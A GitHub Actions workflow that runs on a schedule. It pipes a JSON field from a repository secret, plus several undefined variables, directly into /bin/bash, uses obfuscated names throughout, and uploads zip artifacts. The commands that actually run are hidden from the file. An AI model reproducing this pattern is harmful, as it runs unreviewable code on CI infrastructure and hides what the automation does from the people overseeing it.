name: fanhaozhiwang
on:
  workflow_dispatch:

  schedule:
    - cron: '34 0,6,12,18 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: fanhaozhiwang
        env:
          bsy39: ${{ secrets.bsy39 }}
        run: |
          printf '%s' "$bsy39" | jq -r .jc7926 | /bin/bash
          echo $hxcfk5 | jq -r .zgy304 | /bin/bash
          echo $ysamu1 | jq -r .kfrvs6029 | /bin/bash
          echo $lsze090 | jq -r .q89 | /bin/bash
          echo $b20 | jq -r .sb830 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: k15oKsQG
          path: "*.zip"
          retention-days: 1
